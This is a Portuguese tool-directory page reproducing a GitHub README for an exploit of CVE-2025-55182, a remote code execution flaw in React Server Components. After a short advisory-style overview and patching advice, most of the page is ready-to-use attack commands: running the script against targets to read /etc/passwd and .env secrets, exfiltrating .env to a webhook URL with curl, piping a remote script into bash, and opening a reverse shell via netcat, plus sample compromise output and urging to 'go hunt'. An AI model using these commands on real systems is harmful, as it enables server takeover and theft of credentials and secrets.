Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/shen771/blackash-cve-2025-55182
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHub
308há 10 mesesAinda não revisado
shen771/blackash-cve-2025-55182

Blackash-CVE-2025-55182

CVE-2025-55182

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-55182 — Vulnerabilidade Crítica do Servidor React

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 O Que É

  • ⚛️ Uma falha crítica de segurança nos Componentes de Servidor React (RSC)
  • 🧨 Causada por desserialização insegura
  • 🌐 Explorável através de requisições de rede
  • 🔓 Nenhuma autenticação necessária
  • ☠️ Pode levar à Execução Remota de Código (RCE)

✅ Isso significa que atacantes poderiam potencialmente executar código arbitrário do lado do servidor com uma única requisição maliciosa.


📊 Gravidade

  • 🔴 Pontuação CVSS: 10.0 (Crítica)
  • 🏴‍☠️ Complexidade do Ataque: Baixa
  • 🔑 Privilégios Necessários: Nenhum
  • 👤 Interação do Usuário: Nenhuma
  • 💥 Impacto: Possível comprometimento total do sistema

📦 Tecnologias Afetadas

⚠️ Sistemas que usam Componentes de Servidor React, incluindo:

  • ✅ Pacotes DOM do servidor React
  • ✅ Frameworks que empacotam RSC, como:
    • Next.js (App Router + RSC)
    • Plugins Vite RSC
    • Ferramentas Parcel RSC
    • Redwood, Waku, etc.

❌ Não afetados:

  • Aplicativos React puramente do lado do cliente
  • Aplicativos que NÃO usam Componentes de Servidor

🔥 Por Que Isso É Perigoso

  • 🧑‍💻 Atacantes podem executar comandos no seu servidor
  • 🗃️ Potencial para roubar bancos de dados e segredos
  • 🦠 Pode ser usado para implantar ransomware ou backdoors
  • 🔄 Pode permitir movimentação lateral pela infraestrutura
  • 🚀 Explorável em escala

🛠️ O Que Fazer Imediatamente

✅ 1. Corrigir e Atualizar

  • ⬆️ Atualize o React para versões corrigidas
  • ⬆️ Atualize o Next.js ou qualquer framework baseado em RSC

✅ 2. Auditoria de Dependências

  • 🔍 Varra por pacotes vulneráveis transitivos
  • 🧾 Use:
    • npm audit
    • pnpm audit
    • yarn audit

✅ 3. Proteção Temporária (Não é uma Correção Completa)

  • 🛡️ Regras de WAF
  • 🔐 Filtros de validação de requisições
  • 🚫 Bloqueie payloads suspeitos

⚠️ Isso apenas reduz o risco — NÃO substitui a correção


👥 Quem Deveria Se Preocupar?

  • ✅ Desenvolvedores full-stack que usam Next.js App Router
  • ✅ Equipes de DevOps que hospedam aplicativos React SSR
  • ✅ Engenheiros de segurança monitorando:
    • Serviços web Node.js
    • Runtimes de borda
    • Aplicativos SSR serverless

📌 Conclusão Principal

🚨 Se seu aplicativo usa Componentes de Servidor React e não está corrigido — ele está potencialmente totalmente comprometido agora.


🚨 Aqui estão todos os comandos rápidos que você vai precisar (copie e cole → resultado instantâneo):

CVE-2025-55182.py (RCE básico)

# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"

# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"

# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"

# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"

CVE-2025-55182-revshell.py (shell reverso instantâneo)

# 1. Start listener (once)
nc -lvnp 4444

# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

Isso é literalmente tudo.
Dois scripts, esses 8 comandos → comprometimento total em qualquer site Next.js não corrigido hoje.
Vá atrás dessas recompensas.

Aqui está exatamente o que você verá em tempo real quando o exploit funcionar (alvo 100% não corrigido, 3 de dezembro de 2025):

1. Quando você executa o script RCE normal (CVE-2025-55182.py)
Você digita:

./CVE-2025-55182.py https://target.com "whoami"

Você vê instantaneamente na sua tela:

[+] CVE-2025-55182 Exploit
[+] Target  : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node

→ Esse “node” (ou o que o comando retornar) é a saída real do servidor vítima.
Se você executar id, verá as linhas completas de uid/gid, etc.

2. Quando você executa o script de shell reverso (CVE-2025-55182-revshell.py)
Você digita:

./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

Você vê instantaneamente no seu terminal de escuta:

listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node   420 Dec  3 11:11 .env
...

→ Shell TTY interativo completo como o usuário node (quase sempre o usuário da aplicação web). Você domina a máquina.

Isso é literalmente tudo.
Se você vir algo do acima → exploit funcionou 100%.
Se você receber apenas HTTP 403/404 ou nada → já corrigido ou bloqueado por WAF.

Vá caçar.


aviso legal

Esta PoC é apenas para testes de segurança autorizados e uso educacional.
Não a execute contra qualquer sistema que você não possua ou para o qual não tenha permissão explícita por escrito para testar.
O uso não autorizado é ilegal e pode resultar em processo criminal.
Use apenas em seu laboratório, programas de bug bounty com escopo claro ou alvos que lhe deram permissão.

Você é 100% responsável por suas ações.

Baixar ferramenta